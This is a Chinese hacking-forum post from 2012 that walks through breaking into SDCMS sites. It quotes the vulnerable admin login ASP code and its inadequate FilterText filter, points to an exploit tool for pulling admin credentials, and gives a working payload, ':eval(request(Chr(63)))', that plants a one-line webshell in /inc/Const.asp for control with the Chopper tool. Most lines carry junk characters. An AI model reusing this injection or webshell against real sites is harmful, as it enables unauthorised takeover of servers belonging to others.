作者:T00LS 鬼哥# R6 J% {/ {. h* d$ i
漏洞文件:后台目录/index.asp R' D4 e+ F5 j$ P
5 U$ }$ w' d% HSub Check
' p6 w. ` Q4 ~% D+ d Dim username,password,code,getcode,Rs
s2 O* P; T7 S4 \2 O/ o- B IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub
) w+ \# f8 U! _3 Z( E" s* I username=FilterText(Trim(Request.Form("username")),1)
( ?0 @& x+ p: X3 X7 I password=FilterText(Trim(Request.Form("password")),1)
, ^4 s% J: S. ~5 t3 A; p7 r, S code=Trim(Request.Form("yzm"))
9 }3 w1 {4 Q b, o! U9 { getcode=Session("SDCMSCode")9 @# ~( r! c8 E2 X8 X
IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died
; ^. i! D5 @! K6 l8 f& Z IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied
0 F2 b2 C# {8 s! k6 {- m IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"ied" x4 w# k( Y8 i
IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"ied
4 K& Z7 o1 Q3 e8 R) v) i$ f Z, | IF username="" or password="" Then5 Z$ f( G9 l& l( @
Echo "用户名或密码不能为空"ied
, S2 P0 Q& O) G" l) L% Y8 s' H: \ Else3 I% V2 R0 E+ T1 W# X" N9 Q
Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")! n0 v0 X- q o3 d% Z9 e! C
IF Rs.Eof Then: a4 `; P& X% o# t# U9 D$ o# V) H" O
AddLog username,GetIp,"登录失败",1
% }, U4 w/ G7 d4 w+ S. m O8 q0 J Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"3 Q8 g! Z3 w0 u0 E
Else
3 f5 B$ o8 ^# j' O Add_Cookies "sdcms_id",Rs(0)
# A8 i0 J! f9 J: M* i( ] Add_Cookies "sdcms_name",username0 e M0 q! B8 B
Add_Cookies "sdcms_pwd",Rs(2): b& i% e, `/ R/ b* \8 \
Add_Cookies "sdcms_admin",Rs(3)
- q3 D R! L& p2 }" |* e- S Add_Cookies "sdcms_alllever",Rs(4)7 Z4 {8 ?) ]0 K+ [7 s
Add_Cookies "sdcms_infolever",Rs(5)
7 {9 O4 w/ A8 x% o2 M Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")1 j% K9 @* g: k& c. U& M2 `& n
AddLog username,GetIp,"登录成功",1: E* g; Q& ]' K5 Y( x3 f! {: D
'自动删除30天前的Log记录
9 X, |* \' Y( E1 X4 u! x& g IF Sdcms_DataType Then
4 x" X& s4 y" X' g( E/ M Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
: G1 N' ^9 D! }: m: m U" U/ X1 c Else
0 A3 h! S# k9 y% D) y# h Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")' y9 n' h3 C6 I/ F5 ]. ^
End IF# h, ^3 N8 s' m, h7 g3 K
Go("sdcms_index.asp")
% l- d3 ?/ Q6 p- { End IF' k/ N* n% Y% r4 I, z w
Rs.Close5 T7 G' r5 l7 U* _$ M
Set Rs=Nothing* D/ @( C7 ^ s4 H+ S
End IF4 u6 {" y5 H6 l9 a
End Sub0 a6 J5 m6 y7 f1 d
+ ^: K2 {: N) y" D
’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码& W& i, N+ C( j$ P8 M- X
- v6 ? J9 A5 ?. v# F8 i7 S- u
Function FilterText(ByVal t0,ByVal t1), T; }/ z- p) j& S
IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function7 o) X0 K0 r% n; w/ `2 G! c. z
t0=Trim(t0)- ]* L; Z6 ?7 [! J, I9 w% u! V
Select Case t1# y( t: k: \" I0 w
Case "1"$ `1 R& i% T4 O0 p0 G# s; S1 w
t0=Replace(t0,Chr(32),"")
! _2 ~) S; c4 q, M t0=Replace(t0,Chr(13),"")4 ~2 ^6 m+ H* z9 y6 A
t0=Replace(t0,Chr(10)&Chr(10),"")
& V. X& e4 X8 C/ C# E8 { t0=Replace(t0,Chr(10),"")/ F2 a0 N+ `" v- A
Case "2"
/ L9 d A4 w3 ]8 A) c8 { t0=Replace(t0,Chr(8),"")'回格
- B: X- h }# h! H9 c2 x ? t0=Replace(t0,Chr(9),"")'tab(水平制表符)+ r9 L2 ^: ~9 I5 a$ F3 \( U- _
t0=Replace(t0,Chr(10),"")'换行7 B. T/ F4 F; m; v! t$ X5 x3 l
t0=Replace(t0,Chr(11),"")'tab(垂直制表符)
5 B9 }. {: S4 B8 Y6 R: i t0=Replace(t0,Chr(12),"")'换页0 n: c3 G7 X; Z$ ?# i* a6 x
t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合' _! G0 n5 d( k: t
t0=Replace(t0,Chr(22),"")
( u( U: e; [0 E t0=Replace(t0,Chr(32),"")'空格 SPACE: l( t T: j" v. c, Z$ {4 \
t0=Replace(t0,Chr(33),"")'!# c9 c4 G7 ?+ O! g( I1 P- P) j M
t0=Replace(t0,Chr(34),"")'". n3 z* a7 K6 S! L- C* s
t0=Replace(t0,Chr(35),"")'#( h) `9 K {% v
t0=Replace(t0,Chr(36),"")'$
) T" d1 D# f8 C, Z% a' T' D9 Z L t0=Replace(t0,Chr(37),"")'%& |7 v8 ~ W& l, [6 b# @
t0=Replace(t0,Chr(38),"")'& z( j: m0 P7 F/ w k
t0=Replace(t0,Chr(39),"")''
* F6 { I. C" z, g2 R! B, V t0=Replace(t0,Chr(40),"")'(
1 P: T: Y) i6 f" n t0=Replace(t0,Chr(41),"")'); Q6 d0 w5 g5 g. `
t0=Replace(t0,Chr(42),"")'*, H2 G" |' G; t9 W4 [+ k2 |
t0=Replace(t0,Chr(43),"")'+1 ~7 \. {6 O: k$ M _3 }5 {
t0=Replace(t0,Chr(44),"")',, i6 P9 J3 v. f/ y, a+ K
t0=Replace(t0,Chr(45),"")'-
! B i! G" ^/ I2 B t0=Replace(t0,Chr(46),"")'.
6 q4 E8 y9 V( E# m t0=Replace(t0,Chr(47),"")'/! M+ l. h5 Q3 U" \2 \
t0=Replace(t0,Chr(58),"")':
( z, x: {1 \! d t0=Replace(t0,Chr(59),"")';5 G C& v3 `) K6 P( o/ L8 S5 ~
t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>
5 a% e+ F3 W0 q" I; ]& ^. {( _ t0=Replace(t0,Chr(63),"")'?
W c' R3 \+ m0 q/ [ t0=Replace(t0,Chr(64),"")'@
: R/ |8 |- U' e2 {) g t0=Replace(t0,Chr(91),"")'\
1 w. q8 P6 H9 @" b& G3 u$ n( C0 c t0=Replace(t0,Chr(92),"")'\
; t( t8 J1 ~0 w- n: M0 t F d t0=Replace(t0,Chr(93),"")']
- ]: x- \8 [- i t0=Replace(t0,Chr(94),"")'^
^4 K' D/ A0 n7 m t0=Replace(t0,Chr(95),"")'_
) a% r% f' s! C% B( y/ y+ ] t0=Replace(t0,Chr(96),"")'`
6 ~" e" u" [: D3 K6 o% s' U t0=Replace(t0,Chr(123),"")'{
8 j1 |% Y0 a/ T8 P( ` t0=Replace(t0,Chr(124),"")'|
+ _# B+ P' z- g& }) O t0=Replace(t0,Chr(125),"")'}
2 o; Q( }: k- o9 v+ | t0=Replace(t0,Chr(126),"")'~
* k. Z& t a: y Case Else
3 Z! H3 V* U$ ^# @, P t0=Replace(t0, "&", "&")
+ d1 y V# n3 a& A c t0=Replace(t0, "'", "'")5 r) |, h: N# v, u, u8 p* [
t0=Replace(t0, """", """)# Z" @' t% e: Y
t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">") g' k: d: v* j$ t, V% z
End Select, ?8 C8 [- K6 |9 ?" t8 _" O
IF Instr(Lcase(t0),"expression")>0 Then
# a5 ? _/ e- p t0=Replace(t0,"expression","e­xpression", 1, -1, 0)# b* M) D) Q9 t+ B/ D7 Q! `
End If
# J+ c' y" `: ^8 Q+ ]% ]( Z. B- |9 R FilterText=t0
( V: ^( A5 {3 H4 WEnd Function
$ S( b2 ~. h" w1 n# o, i$ W
# A5 S; d" y9 _: F6 s2 x% F看到没。直接参数是1 只过滤: x' Q4 I' @9 j \4 d9 T
t0=Replace(t0,Chr(32)," ")
0 \% _! J! J" @# ^2 K t0=Replace(t0,Chr(13),"")
6 d# Y! Z2 V3 r. f* N t0=Replace(t0,Chr(10)&Chr(10),"
; ?* M$ p+ K6 i" A. e1 M* I3 X! a")
! E; E8 i3 y! l; J8 ?. y% T' w9 D, ` t0=Replace(t0,Chr(10),"* ^: w: o5 i. {$ F( y
")& p ]8 a! }$ j6 X2 E$ o
漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!
) w1 B W2 f# }EXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP3 Y: i; T: u$ w' F/ H, T
9 G9 s( c! `" V: E9 d. {$ y测试:
- |4 K5 K9 y* D6 h' y( f4 c" I/ w9 v% G6 W" q( B1 O
& n" V. ?8 f1 i/ K7 q) g! m现在输入工具上验证码,然后点OK
; ]& D8 R1 x0 m9 C* r$ F" ^1 q6 w
6 @( k+ l" r" ^ x. K1 W/ u/ X7 b4 O; w
8 g% t3 ~; i- o看到我们直接进入后台管理界面了,呵呵!9 E. j3 }3 `5 \. `3 t
& t8 s1 C, d2 Y7 F& K
; z3 b& `% `6 g' N q# P; ?7 B S3 S0 u# n% U% O- d& m7 R
这样直接进入后台了。。。。
; D9 z0 C" \# V D, o3 q9 |( | _- k6 {& { F3 r6 q8 }7 q
P& p0 K; j% Z* P! a* v" `$ P1 v. `
SDCMS提权:
: b1 K% R: k2 p% V1 M8 Z, P' I' o4 c
. |1 d" D% G/ Z方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?
. N, O1 y) h% ~* j3 Q
, X! Y* s8 r6 n5 u/ V
) @" x! `1 j2 y# w6 J. m7 b: F; Q4 |) n# a+ E- Q3 I' C. ~
OK,现在用菜刀连接下!: A" J/ p F# ^
' f8 k3 d; k" Q# a6 M+ j1 k; ^) b: `. b0 I$ [, p
' Q; i& e- l: k% V
: R& G3 m) g1 F0 u
7 J" B/ g) W3 r0 D5 R9 U; u |
发表于 2012-11-9 20:57:02
收藏
支持
反对